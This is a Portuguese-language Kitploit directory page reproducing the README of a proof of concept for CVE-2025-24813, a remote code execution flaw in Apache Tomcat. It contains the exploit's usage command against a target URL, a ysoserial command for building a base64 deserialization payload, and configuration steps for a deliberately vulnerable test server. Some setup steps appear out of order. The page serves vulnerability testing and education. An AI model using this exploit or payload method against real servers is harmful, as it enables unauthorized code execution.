Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24813-POC — CVE-2025-24813 Apache Tomcat RCE Prova de Conceito (PoC) | Kitploit
Ferramentas/GitHubGitHub/alaatk/cve-2025-24813-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubalaatk/cve-2025-24813-poc

CVE-2025-24813-POC

CVE-2025-24813 Apache Tomcat RCE Prova de Conceito (PoC)

Ver Repositório
4há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24813 Apache Tomcat RCE PoC

PoC para CVE-2025-24813, uma vulnerabilidade de Execução Remota de Código (RCE) no Apache Tomcat.

Importante: Este PoC destina-se exclusivamente a testes em seus próprios ambientes ou para fins educacionais. Qualquer uso deste PoC para explorar sistemas sem a devida autorização é proibido e pode ser ilegal. Os criadores e distribuidores deste PoC não são responsáveis por qualquer uso indevido ou dano causado. Sempre obtenha permissão explícita antes de testar qualquer ambiente que não seja de sua propriedade.


Uso

root@kitploit:~
python3 CVE-2025-24813.py --url <target_url>

Configuração do Ambiente

Payload de Teste

O código já contém um payload codificado em base64 gerado com ysoserial (https://github.com/frohoff/ysoserial) que cria um arquivo RCE-success em /tmp da seguinte forma:

root@kitploit:~
java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/RCE-success" | base64 -w 0

Configurando um Ambiente Tomcat Vulnerável

  1. Habilitar acesso PUT / escrita

    Edite $CATALINA_HOME/conf/web.xml para adicionar um parâmetro readonly na seção do servlet default e defina-o como false.

    root@kitploit:~
        <servlet>
            <servlet-name>default</servlet-name>
            <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
            <init-param>
                <param-name>debug</param-name>
                <param-value>0</param-value>
            </init-param>
            <init-param>
                <param-name>listings</param-name>
                <param-value>false</param-value>
            </init-param>
            <init-param>
              <param-name>readonly</param-name>
              <param-value>false</param-value>
            </init-param>
            <load-on-startup>1</load-on-startup>
        </servlet>
    
  2. Habilitar persistência de sessão

    • Parte a) Edite $CATALINA_HOME/conf/context.xml e adicione a seguinte configuração.
    root@kitploit:~
        <Manager className="org.apache.catalina.session.PersistentManager">
          <Store className="org.apache.catalina.session.FileStore" />
        </Manager>
    
root@kitploit:~
cd $CATALINA_HOME/lib/
wget https[:]//repo1.maven[.]org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar
wget https[:]//repo1.maven[.]org/maven2/commons-beanutils/commons-beanutils/1.9.2/commons-beanutils-1.9.2.jar
wget https[:]//repo1.maven[.]org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar

Saída

  • Exploração bem-sucedida:
root@kitploit:~
[+] Exploit provavelmente bem-sucedido
  • Exploração falhou:
root@kitploit:~
[-] Exploit falhou com código de status: {status_code}, em vez de 500,409

Demo

Baixar ferramenta
  • Parte b) Edite $CATALINA_HOME/webapps/ROOT/index.jsp e certifique-se de que a configuração padrão para sessão não seja "false" ou simplesmente remova-a.
root@kitploit:~
 <%@ page session="true" pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>

OU

root@kitploit:~
 <%@ page pageEncoding="UTF-8" contentType="text/html; charset=UTF-8" %>
  • Baixe as dependências para $CATALINA_HOME/lib/